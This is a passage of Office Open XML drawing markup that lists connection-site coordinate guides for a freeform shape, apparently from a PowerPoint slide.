              <a:gd name="connsiteX52" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 272284 w 1342244"/>
